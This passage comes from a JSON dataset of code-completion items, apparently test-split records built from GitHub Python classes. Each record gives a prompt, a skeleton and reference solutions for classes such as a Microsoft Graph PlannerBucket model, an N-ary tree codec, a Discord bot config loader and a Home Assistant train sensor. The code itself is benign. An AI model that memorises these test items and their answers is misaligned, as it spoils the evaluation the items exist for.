Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: PlannerBucket", "name": "create_from_discriminator_value", "signature": "def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> PlannerBucket"}, {"docstring": "The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]", "name": "get_field_deserializers", "signature": "def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]"}, {"docstring": "Serializes information the current object Args: writer: Serialization writer to use to serialize this model", "name": "serialize", "signature": "def serialize(self, writer: SerializationWriter) -> None"}], "n_methods": 3, "prompt": "Implement the Python class `PlannerBucket` described below.\n\nClass description:\nImplement the PlannerBucket class.\n\nMethod signatures and docstrings:\n- def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> PlannerBucket: Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: PlannerBucket\n- def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]: The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\n- def serialize(self, writer: SerializationWriter) -> None: Serializes information the current object Args: writer: Serialization writer to use to serialize this model", "prompted_full_text": "Implement the Python class `PlannerBucket` described below.\n\nClass description:\nImplement the PlannerBucket class.\n\nMethod signatures and docstrings:\n- def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> PlannerBucket: Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: PlannerBucket\n- def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]: The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\n- def serialize(self, writer: SerializationWriter) -> None: Serializes information the current object Args: writer: Serialization writer to use to serialize this model\n\n<|skeleton|>\nclass PlannerBucket:\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> PlannerBucket:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: PlannerBucket\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return PlannerBucket()\n<|end_body_0|>\n\n<|body_start_1|>\n from .entity import Entity\n from .planner_task import PlannerTask\n from .entity import Entity\n from .planner_task import PlannerTask\n fields: Dict[str, Callable[[Any], None]] = {'name': lambda n: setattr(self, 'name', n.get_str_value()), 'orderHint': lambda n: setattr(self, 'order_hint', n.get_str_value()), 'planId': lambda n: setattr(self, 'plan_id', n.get_str_value()), 'tasks': lambda n: setattr(self, 'tasks', n.get_collection_of_object_values(PlannerTask))}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n<|end_body_1|>\n\n<|body_start_2|>\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_str_value('name', self.name)\n writer.write_str_value('orderHint', self.order_hint)\n writer.write_str_value('planId', self.plan_id)\n writer.write_collection_of_object_values('tasks', self.tasks)\n<|end_body_2|>\n", "revision_id": "27de7ccbe688d7614b2f6bde0fdbcda4bc5cc949", "skeleton": "<|skeleton|>\nclass PlannerBucket:\n\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> PlannerBucket:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: PlannerBucket\"\"\"\n <|body_0|>\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n <|body_1|>\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PlannerBucket:\n def create_from_discriminator_value(parse_node: Optional[ParseNode]=None) -> PlannerBucket:\n \"\"\"Creates a new instance of the appropriate class based on discriminator value Args: parse_node: The parse node to use to read the discriminator value and create the object Returns: PlannerBucket\"\"\"\n if not parse_node:\n raise TypeError('parse_node cannot be null.')\n return PlannerBucket()\n\n def get_field_deserializers(self) -> Dict[str, Callable[[ParseNode], None]]:\n \"\"\"The deserialization information for the current model Returns: Dict[str, Callable[[ParseNode], None]]\"\"\"\n from .entity import Entity\n from .planner_task import PlannerTask\n from .entity import Entity\n from .planner_task import PlannerTask\n fields: Dict[str, Callable[[Any], None]] = {'name': lambda n: setattr(self, 'name', n.get_str_value()), 'orderHint': lambda n: setattr(self, 'order_hint', n.get_str_value()), 'planId': lambda n: setattr(self, 'plan_id', n.get_str_value()), 'tasks': lambda n: setattr(self, 'tasks', n.get_collection_of_object_values(PlannerTask))}\n super_fields = super().get_field_deserializers()\n fields.update(super_fields)\n return fields\n\n def serialize(self, writer: SerializationWriter) -> None:\n \"\"\"Serializes information the current object Args: writer: Serialization writer to use to serialize this model\"\"\"\n if not writer:\n raise TypeError('writer cannot be null.')\n super().serialize(writer)\n writer.write_str_value('name', self.name)\n writer.write_str_value('orderHint', self.order_hint)\n writer.write_str_value('planId', self.plan_id)\n writer.write_collection_of_object_values('tasks', self.tasks)\n", "source": "the_stack_v2_python_sparse", "source_path": "msgraph/generated/models/planner_bucket.py", "source_repo": "microsoftgraph/msgraph-sdk-python", "split": "test", "star_events_count": 135} {"blob_id": "cd3573f0dfa867d336d395af0fa81e99a4782534", "bodies": ["res = []\n\ndef helper(root):\n if not root:\n return\n res.append(str(root.val))\n res.append(str(len(root.children)))\n for ch in root.children:\n helper(ch)\nhelper(root)\nreturn ','.join(res)", "if not data:\n return\ndata = iter(data.split(','))\n\ndef helper():\n tmp = int(next(data))\n num = int(next(data))\n root = Node(tmp, [])\n for _ in range(num):\n root.children.append(helper())\n return root\nreturn helper()"], "bodies_text": "<|body_start_0|>\n res = []\n\n def helper(root):\n if not root:\n return\n res.append(str(root.val))\n res.append(str(len(root.children)))\n for ch in root.children:\n helper(ch)\n helper(root)\n return ','.join(res)\n<|end_body_0|>\n\n<|body_start_1|>\n if not data:\n return\n data = iter(data.split(','))\n\n def helper():\n tmp = int(next(data))\n num = int(next(data))\n root = Node(tmp, [])\n for _ in range(num):\n root.children.append(helper())\n return root\n return helper()\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Codec", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root: 'Node') -> str:\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data: str) -> 'Node':\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n res = []\n\n def helper(root):\n if not root:\n return\n res.append(str(root.val))\n res.append(str(len(root.children)))\n for ch in root.children:\n helper(ch)\n helper(root)\n return ','.join(res)\n<|end_body_0|>\n\n<|body_start_1|>\n if not data:\n return\n data = iter(data.split(','))\n\n def helper():\n tmp = int(next(data))\n num = int(next(data))\n root = Node(tmp, [])\n for _ in range(num):\n root.children.append(helper())\n return root\n return helper()\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000093", "length_bytes": 2421, "license_type": "no_license", "methods": [{"docstring": "Encodes a tree to a single string. :type root: Node :rtype: str", "name": "serialize", "signature": "def serialize(self, root: 'Node') -> str"}, {"docstring": "Decodes your encoded data to tree. :type data: str :rtype: Node", "name": "deserialize", "signature": "def deserialize(self, data: str) -> 'Node'"}], "n_methods": 2, "prompt": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root: 'Node') -> str: Encodes a tree to a single string. :type root: Node :rtype: str\n- def deserialize(self, data: str) -> 'Node': Decodes your encoded data to tree. :type data: str :rtype: Node", "prompted_full_text": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root: 'Node') -> str: Encodes a tree to a single string. :type root: Node :rtype: str\n- def deserialize(self, data: str) -> 'Node': Decodes your encoded data to tree. :type data: str :rtype: Node\n\n<|skeleton|>\nclass Codec:\n\n def serialize(self, root: 'Node') -> str:\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data: str) -> 'Node':\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n res = []\n\n def helper(root):\n if not root:\n return\n res.append(str(root.val))\n res.append(str(len(root.children)))\n for ch in root.children:\n helper(ch)\n helper(root)\n return ','.join(res)\n<|end_body_0|>\n\n<|body_start_1|>\n if not data:\n return\n data = iter(data.split(','))\n\n def helper():\n tmp = int(next(data))\n num = int(next(data))\n root = Node(tmp, [])\n for _ in range(num):\n root.children.append(helper())\n return root\n return helper()\n<|end_body_1|>\n", "revision_id": "631df2ce6892a6fbb3e435f57e90d85f8200d125", "skeleton": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root: 'Node') -> str:\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data: str) -> 'Node':\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Codec:\n def serialize(self, root: 'Node') -> str:\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n res = []\n\n def helper(root):\n if not root:\n return\n res.append(str(root.val))\n res.append(str(len(root.children)))\n for ch in root.children:\n helper(ch)\n helper(root)\n return ','.join(res)\n\n def deserialize(self, data: str) -> 'Node':\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n if not data:\n return\n data = iter(data.split(','))\n\n def helper():\n tmp = int(next(data))\n num = int(next(data))\n root = Node(tmp, [])\n for _ in range(num):\n root.children.append(helper())\n return root\n return helper()\n", "source": "the_stack_v2_python_sparse", "source_path": "428. Serialize and Deserialize N-ary Tree.py", "source_repo": "c940606/leetcode", "split": "test", "star_events_count": 3} {"blob_id": "5513b1a465acc12fc9e986102ffd80c109b438d1", "bodies": ["super().__init__(*args, **kwargs)\nself.config = {}\nself.config_file = kwargs.get('config_file', 'config.json')\nself.session = aiohttp.ClientSession(loop=self.loop)", "if not filename:\n filename = self.config_file\nwith open(filename) as file_object:\n config = json.load(file_object)\nif isinstance(config, dict):\n for key, value in config.items():\n self.config[key] = value", "if not filename:\n filename = self.config_file\nwith open(filename, 'w') as file_object:\n json.dump(self.config, file_object, indent=4, sort_keys=True)"], "bodies_text": "<|body_start_0|>\n super().__init__(*args, **kwargs)\n self.config = {}\n self.config_file = kwargs.get('config_file', 'config.json')\n self.session = aiohttp.ClientSession(loop=self.loop)\n<|end_body_0|>\n\n<|body_start_1|>\n if not filename:\n filename = self.config_file\n with open(filename) as file_object:\n config = json.load(file_object)\n if isinstance(config, dict):\n for key, value in config.items():\n self.config[key] = value\n<|end_body_1|>\n\n<|body_start_2|>\n if not filename:\n filename = self.config_file\n with open(filename, 'w') as file_object:\n json.dump(self.config, file_object, indent=4, sort_keys=True)\n<|end_body_2|>\n", "class_docstring": "A custom bot object that provides a configuration handler and an aiohttp ClientSession. This is similar to k3.", "class_name": "Bot", "detected_licenses": ["MIT", "LicenseRef-scancode-unknown-license-reference"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Bot:\n \"\"\"A custom bot object that provides a configuration handler and an aiohttp ClientSession. This is similar to k3.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"In addition to everything supported by commands.Bot, this also supports: * `config_file` - An `str` representing the configuration file of the bot. Defaults to `config.json`. This doesn't really have to be used, but it's there for convenience reasons. Instance variables not in the constructor: * `session` - An `aiohttp.ClientSession` that the bot can use to make HTTP requests. This is useful for commands that perform API hooks. * `config` - A `dict` containing key-value pairs meant for bot configuration. This doesn't really have to be used, but it's there for convenience reasons.\"\"\"\n <|body_0|>\n\n def load_config(self, filename: str=None):\n \"\"\"Load config from a JSON file. * `filename` - The filename of the JSON file to be loaded. If not specified, the bot will default to `Bot.config_file`.\"\"\"\n <|body_1|>\n\n def save_config(self, filename: str=None):\n \"\"\"Save config to a JSON file. * `filename` - The filename of the JSON file to be saved to. If not specified, the bot will default to `Bot.config_file`.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(*args, **kwargs)\n self.config = {}\n self.config_file = kwargs.get('config_file', 'config.json')\n self.session = aiohttp.ClientSession(loop=self.loop)\n<|end_body_0|>\n\n<|body_start_1|>\n if not filename:\n filename = self.config_file\n with open(filename) as file_object:\n config = json.load(file_object)\n if isinstance(config, dict):\n for key, value in config.items():\n self.config[key] = value\n<|end_body_1|>\n\n<|body_start_2|>\n if not filename:\n filename = self.config_file\n with open(filename, 'w') as file_object:\n json.dump(self.config, file_object, indent=4, sort_keys=True)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000094", "length_bytes": 2231, "license_type": "permissive", "methods": [{"docstring": "In addition to everything supported by commands.Bot, this also supports: * `config_file` - An `str` representing the configuration file of the bot. Defaults to `config.json`. This doesn't really have to be used, but it's there for convenience reasons. Instance variables not in the constructor: * `session` - An `aiohttp.ClientSession` that the bot can use to make HTTP requests. This is useful for commands that perform API hooks. * `config` - A `dict` containing key-value pairs meant for bot configuration. This doesn't really have to be used, but it's there for convenience reasons.", "name": "__init__", "signature": "def __init__(self, *args, **kwargs)"}, {"docstring": "Load config from a JSON file. * `filename` - The filename of the JSON file to be loaded. If not specified, the bot will default to `Bot.config_file`.", "name": "load_config", "signature": "def load_config(self, filename: str=None)"}, {"docstring": "Save config to a JSON file. * `filename` - The filename of the JSON file to be saved to. If not specified, the bot will default to `Bot.config_file`.", "name": "save_config", "signature": "def save_config(self, filename: str=None)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_001063", "prompt": "Implement the Python class `Bot` described below.\n\nClass description:\nA custom bot object that provides a configuration handler and an aiohttp ClientSession. This is similar to k3.\n\nMethod signatures and docstrings:\n- def __init__(self, *args, **kwargs): In addition to everything supported by commands.Bot, this also supports: * `config_file` - An `str` representing the configuration file of the bot. Defaults to `config.json`. This doesn't really have to be used, but it's there for convenience reasons. Instance variables not in the constructor: * `session` - An `aiohttp.ClientSession` that the bot can use to make HTTP requests. This is useful for commands that perform API hooks. * `config` - A `dict` containing key-value pairs meant for bot configuration. This doesn't really have to be used, but it's there for convenience reasons.\n- def load_config(self, filename: str=None): Load config from a JSON file. * `filename` - The filename of the JSON file to be loaded. If not specified, the bot will default to `Bot.config_file`.\n- def save_config(self, filename: str=None): Save config to a JSON file. * `filename` - The filename of the JSON file to be saved to. If not specified, the bot will default to `Bot.config_file`.", "prompted_full_text": "Implement the Python class `Bot` described below.\n\nClass description:\nA custom bot object that provides a configuration handler and an aiohttp ClientSession. This is similar to k3.\n\nMethod signatures and docstrings:\n- def __init__(self, *args, **kwargs): In addition to everything supported by commands.Bot, this also supports: * `config_file` - An `str` representing the configuration file of the bot. Defaults to `config.json`. This doesn't really have to be used, but it's there for convenience reasons. Instance variables not in the constructor: * `session` - An `aiohttp.ClientSession` that the bot can use to make HTTP requests. This is useful for commands that perform API hooks. * `config` - A `dict` containing key-value pairs meant for bot configuration. This doesn't really have to be used, but it's there for convenience reasons.\n- def load_config(self, filename: str=None): Load config from a JSON file. * `filename` - The filename of the JSON file to be loaded. If not specified, the bot will default to `Bot.config_file`.\n- def save_config(self, filename: str=None): Save config to a JSON file. * `filename` - The filename of the JSON file to be saved to. If not specified, the bot will default to `Bot.config_file`.\n\n<|skeleton|>\nclass Bot:\n \"\"\"A custom bot object that provides a configuration handler and an aiohttp ClientSession. This is similar to k3.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"In addition to everything supported by commands.Bot, this also supports: * `config_file` - An `str` representing the configuration file of the bot. Defaults to `config.json`. This doesn't really have to be used, but it's there for convenience reasons. Instance variables not in the constructor: * `session` - An `aiohttp.ClientSession` that the bot can use to make HTTP requests. This is useful for commands that perform API hooks. * `config` - A `dict` containing key-value pairs meant for bot configuration. This doesn't really have to be used, but it's there for convenience reasons.\"\"\"\n <|body_0|>\n\n def load_config(self, filename: str=None):\n \"\"\"Load config from a JSON file. * `filename` - The filename of the JSON file to be loaded. If not specified, the bot will default to `Bot.config_file`.\"\"\"\n <|body_1|>\n\n def save_config(self, filename: str=None):\n \"\"\"Save config to a JSON file. * `filename` - The filename of the JSON file to be saved to. If not specified, the bot will default to `Bot.config_file`.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(*args, **kwargs)\n self.config = {}\n self.config_file = kwargs.get('config_file', 'config.json')\n self.session = aiohttp.ClientSession(loop=self.loop)\n<|end_body_0|>\n\n<|body_start_1|>\n if not filename:\n filename = self.config_file\n with open(filename) as file_object:\n config = json.load(file_object)\n if isinstance(config, dict):\n for key, value in config.items():\n self.config[key] = value\n<|end_body_1|>\n\n<|body_start_2|>\n if not filename:\n filename = self.config_file\n with open(filename, 'w') as file_object:\n json.dump(self.config, file_object, indent=4, sort_keys=True)\n<|end_body_2|>\n", "revision_id": "9bf3f2125939b66bd1894e509c1b1fa1ab413a6a", "skeleton": "<|skeleton|>\nclass Bot:\n \"\"\"A custom bot object that provides a configuration handler and an aiohttp ClientSession. This is similar to k3.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"In addition to everything supported by commands.Bot, this also supports: * `config_file` - An `str` representing the configuration file of the bot. Defaults to `config.json`. This doesn't really have to be used, but it's there for convenience reasons. Instance variables not in the constructor: * `session` - An `aiohttp.ClientSession` that the bot can use to make HTTP requests. This is useful for commands that perform API hooks. * `config` - A `dict` containing key-value pairs meant for bot configuration. This doesn't really have to be used, but it's there for convenience reasons.\"\"\"\n <|body_0|>\n\n def load_config(self, filename: str=None):\n \"\"\"Load config from a JSON file. * `filename` - The filename of the JSON file to be loaded. If not specified, the bot will default to `Bot.config_file`.\"\"\"\n <|body_1|>\n\n def save_config(self, filename: str=None):\n \"\"\"Save config to a JSON file. * `filename` - The filename of the JSON file to be saved to. If not specified, the bot will default to `Bot.config_file`.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Bot:\n \"\"\"A custom bot object that provides a configuration handler and an aiohttp ClientSession. This is similar to k3.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"In addition to everything supported by commands.Bot, this also supports: * `config_file` - An `str` representing the configuration file of the bot. Defaults to `config.json`. This doesn't really have to be used, but it's there for convenience reasons. Instance variables not in the constructor: * `session` - An `aiohttp.ClientSession` that the bot can use to make HTTP requests. This is useful for commands that perform API hooks. * `config` - A `dict` containing key-value pairs meant for bot configuration. This doesn't really have to be used, but it's there for convenience reasons.\"\"\"\n super().__init__(*args, **kwargs)\n self.config = {}\n self.config_file = kwargs.get('config_file', 'config.json')\n self.session = aiohttp.ClientSession(loop=self.loop)\n\n def load_config(self, filename: str=None):\n \"\"\"Load config from a JSON file. * `filename` - The filename of the JSON file to be loaded. If not specified, the bot will default to `Bot.config_file`.\"\"\"\n if not filename:\n filename = self.config_file\n with open(filename) as file_object:\n config = json.load(file_object)\n if isinstance(config, dict):\n for key, value in config.items():\n self.config[key] = value\n\n def save_config(self, filename: str=None):\n \"\"\"Save config to a JSON file. * `filename` - The filename of the JSON file to be saved to. If not specified, the bot will default to `Bot.config_file`.\"\"\"\n if not filename:\n filename = self.config_file\n with open(filename, 'w') as file_object:\n json.dump(self.config, file_object, indent=4, sort_keys=True)\n", "source": "the_stack_v2_python_sparse", "source_path": "k2/core.py", "source_repo": "DasWolke/kitsuchan-2", "split": "test", "star_events_count": 1} {"blob_id": "54ac2e5bc9ae8d48b98b2d59e47134e45b5050f6", "bodies": ["self._train_api = train_api\nself._from_station = from_station\nself._to_station = to_station\nself._weekday = weekday\nself._time = departuretime\nself._attr_device_info = DeviceInfo(entry_type=DeviceEntryType.SERVICE, identifiers={(DOMAIN, entry_id)}, manufacturer='Trafikverket', model='v2.0', name=name, configuration_url='https://api.trafikinfo.trafikverket.se/')\nif TYPE_CHECKING:\n assert from_station.name and to_station.name\nself._attr_unique_id = create_unique_id(from_station.name, to_station.name, departuretime, weekday)", "when = dt.now()\n_state: TrainStop | None = None\nif self._time:\n departure_day = next_departuredate(self._weekday)\n when = datetime.combine(departure_day, self._time, dt.get_time_zone(self.hass.config.time_zone))\ntry:\n if self._time:\n _LOGGER.debug('%s, %s, %s', self._from_station, self._to_station, when)\n _state = await self._train_api.async_get_train_stop(self._from_station, self._to_station, when)\n else:\n _state = await self._train_api.async_get_next_train_stop(self._from_station, self._to_station, when)\nexcept (NoTrainAnnouncementFound, MultipleTrainAnnouncementFound) as error:\n _LOGGER.error('Departure %s encountered a problem: %s', when, error)\nif not _state:\n self._attr_available = False\n self._attr_native_value = None\n self._attr_extra_state_attributes = {}\n return\nself._attr_available = True\nif TYPE_CHECKING:\n assert _state.advertised_time_at_location\nself._attr_native_value = dt.as_utc(_state.advertised_time_at_location)\nif _state.time_at_location:\n self._attr_native_value = dt.as_utc(_state.time_at_location)\nif _state.estimated_time_at_location:\n self._attr_native_value = dt.as_utc(_state.estimated_time_at_location)\nself._update_attributes(_state)", "attributes: dict[str, Any] = {ATTR_DEPARTURE_STATE: state.get_state().value, ATTR_CANCELED: state.canceled, ATTR_DELAY_TIME: None, ATTR_PLANNED_TIME: None, ATTR_ESTIMATED_TIME: None, ATTR_ACTUAL_TIME: None, ATTR_OTHER_INFORMATION: None, ATTR_DEVIATIONS: None}\nif (delay_in_minutes := state.get_delay_time()):\n attributes[ATTR_DELAY_TIME] = delay_in_minutes.total_seconds() / 60\nif (advert_time := state.advertised_time_at_location):\n attributes[ATTR_PLANNED_TIME] = _to_iso_format(advert_time)\nif (est_time := state.estimated_time_at_location):\n attributes[ATTR_ESTIMATED_TIME] = _to_iso_format(est_time)\nif (time_location := state.time_at_location):\n attributes[ATTR_ACTUAL_TIME] = _to_iso_format(time_location)\nif (other_info := state.other_information):\n attributes[ATTR_OTHER_INFORMATION] = ', '.join(other_info)\nif (deviation := state.deviations):\n attributes[ATTR_DEVIATIONS] = ', '.join(deviation)\nself._attr_extra_state_attributes = attributes"], "bodies_text": "<|body_start_0|>\n self._train_api = train_api\n self._from_station = from_station\n self._to_station = to_station\n self._weekday = weekday\n self._time = departuretime\n self._attr_device_info = DeviceInfo(entry_type=DeviceEntryType.SERVICE, identifiers={(DOMAIN, entry_id)}, manufacturer='Trafikverket', model='v2.0', name=name, configuration_url='https://api.trafikinfo.trafikverket.se/')\n if TYPE_CHECKING:\n assert from_station.name and to_station.name\n self._attr_unique_id = create_unique_id(from_station.name, to_station.name, departuretime, weekday)\n<|end_body_0|>\n\n<|body_start_1|>\n when = dt.now()\n _state: TrainStop | None = None\n if self._time:\n departure_day = next_departuredate(self._weekday)\n when = datetime.combine(departure_day, self._time, dt.get_time_zone(self.hass.config.time_zone))\n try:\n if self._time:\n _LOGGER.debug('%s, %s, %s', self._from_station, self._to_station, when)\n _state = await self._train_api.async_get_train_stop(self._from_station, self._to_station, when)\n else:\n _state = await self._train_api.async_get_next_train_stop(self._from_station, self._to_station, when)\n except (NoTrainAnnouncementFound, MultipleTrainAnnouncementFound) as error:\n _LOGGER.error('Departure %s encountered a problem: %s', when, error)\n if not _state:\n self._attr_available = False\n self._attr_native_value = None\n self._attr_extra_state_attributes = {}\n return\n self._attr_available = True\n if TYPE_CHECKING:\n assert _state.advertised_time_at_location\n self._attr_native_value = dt.as_utc(_state.advertised_time_at_location)\n if _state.time_at_location:\n self._attr_native_value = dt.as_utc(_state.time_at_location)\n if _state.estimated_time_at_location:\n self._attr_native_value = dt.as_utc(_state.estimated_time_at_location)\n self._update_attributes(_state)\n<|end_body_1|>\n\n<|body_start_2|>\n attributes: dict[str, Any] = {ATTR_DEPARTURE_STATE: state.get_state().value, ATTR_CANCELED: state.canceled, ATTR_DELAY_TIME: None, ATTR_PLANNED_TIME: None, ATTR_ESTIMATED_TIME: None, ATTR_ACTUAL_TIME: None, ATTR_OTHER_INFORMATION: None, ATTR_DEVIATIONS: None}\n if (delay_in_minutes := state.get_delay_time()):\n attributes[ATTR_DELAY_TIME] = delay_in_minutes.total_seconds() / 60\n if (advert_time := state.advertised_time_at_location):\n attributes[ATTR_PLANNED_TIME] = _to_iso_format(advert_time)\n if (est_time := state.estimated_time_at_location):\n attributes[ATTR_ESTIMATED_TIME] = _to_iso_format(est_time)\n if (time_location := state.time_at_location):\n attributes[ATTR_ACTUAL_TIME] = _to_iso_format(time_location)\n if (other_info := state.other_information):\n attributes[ATTR_OTHER_INFORMATION] = ', '.join(other_info)\n if (deviation := state.deviations):\n attributes[ATTR_DEVIATIONS] = ', '.join(deviation)\n self._attr_extra_state_attributes = attributes\n<|end_body_2|>\n", "class_docstring": "Contains data about a train depature.", "class_name": "TrainSensor", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TrainSensor:\n \"\"\"Contains data about a train depature.\"\"\"\n\n def __init__(self, train_api: TrafikverketTrain, name: str, from_station: StationInfo, to_station: StationInfo, weekday: list, departuretime: time | None, entry_id: str) -> None:\n \"\"\"Initialize the sensor.\"\"\"\n <|body_0|>\n\n async def async_update(self) -> None:\n \"\"\"Retrieve latest state.\"\"\"\n <|body_1|>\n\n def _update_attributes(self, state: TrainStop) -> None:\n \"\"\"Return extra state attributes.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._train_api = train_api\n self._from_station = from_station\n self._to_station = to_station\n self._weekday = weekday\n self._time = departuretime\n self._attr_device_info = DeviceInfo(entry_type=DeviceEntryType.SERVICE, identifiers={(DOMAIN, entry_id)}, manufacturer='Trafikverket', model='v2.0', name=name, configuration_url='https://api.trafikinfo.trafikverket.se/')\n if TYPE_CHECKING:\n assert from_station.name and to_station.name\n self._attr_unique_id = create_unique_id(from_station.name, to_station.name, departuretime, weekday)\n<|end_body_0|>\n\n<|body_start_1|>\n when = dt.now()\n _state: TrainStop | None = None\n if self._time:\n departure_day = next_departuredate(self._weekday)\n when = datetime.combine(departure_day, self._time, dt.get_time_zone(self.hass.config.time_zone))\n try:\n if self._time:\n _LOGGER.debug('%s, %s, %s', self._from_station, self._to_station, when)\n _state = await self._train_api.async_get_train_stop(self._from_station, self._to_station, when)\n else:\n _state = await self._train_api.async_get_next_train_stop(self._from_station, self._to_station, when)\n except (NoTrainAnnouncementFound, MultipleTrainAnnouncementFound) as error:\n _LOGGER.error('Departure %s encountered a problem: %s', when, error)\n if not _state:\n self._attr_available = False\n self._attr_native_value = None\n self._attr_extra_state_attributes = {}\n return\n self._attr_available = True\n if TYPE_CHECKING:\n assert _state.advertised_time_at_location\n self._attr_native_value = dt.as_utc(_state.advertised_time_at_location)\n if _state.time_at_location:\n self._attr_native_value = dt.as_utc(_state.time_at_location)\n if _state.estimated_time_at_location:\n self._attr_native_value = dt.as_utc(_state.estimated_time_at_location)\n self._update_attributes(_state)\n<|end_body_1|>\n\n<|body_start_2|>\n attributes: dict[str, Any] = {ATTR_DEPARTURE_STATE: state.get_state().value, ATTR_CANCELED: state.canceled, ATTR_DELAY_TIME: None, ATTR_PLANNED_TIME: None, ATTR_ESTIMATED_TIME: None, ATTR_ACTUAL_TIME: None, ATTR_OTHER_INFORMATION: None, ATTR_DEVIATIONS: None}\n if (delay_in_minutes := state.get_delay_time()):\n attributes[ATTR_DELAY_TIME] = delay_in_minutes.total_seconds() / 60\n if (advert_time := state.advertised_time_at_location):\n attributes[ATTR_PLANNED_TIME] = _to_iso_format(advert_time)\n if (est_time := state.estimated_time_at_location):\n attributes[ATTR_ESTIMATED_TIME] = _to_iso_format(est_time)\n if (time_location := state.time_at_location):\n attributes[ATTR_ACTUAL_TIME] = _to_iso_format(time_location)\n if (other_info := state.other_information):\n attributes[ATTR_OTHER_INFORMATION] = ', '.join(other_info)\n if (deviation := state.deviations):\n attributes[ATTR_DEVIATIONS] = ', '.join(deviation)\n self._attr_extra_state_attributes = attributes\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000095", "length_bytes": 7335, "license_type": "permissive", "methods": [{"docstring": "Initialize the sensor.", "name": "__init__", "signature": "def __init__(self, train_api: TrafikverketTrain, name: str, from_station: StationInfo, to_station: StationInfo, weekday: list, departuretime: time | None, entry_id: str) -> None"}, {"docstring": "Retrieve latest state.", "name": "async_update", "signature": "async def async_update(self) -> None"}, {"docstring": "Return extra state attributes.", "name": "_update_attributes", "signature": "def _update_attributes(self, state: TrainStop) -> None"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005692", "prompt": "Implement the Python class `TrainSensor` described below.\n\nClass description:\nContains data about a train depature.\n\nMethod signatures and docstrings:\n- def __init__(self, train_api: TrafikverketTrain, name: str, from_station: StationInfo, to_station: StationInfo, weekday: list, 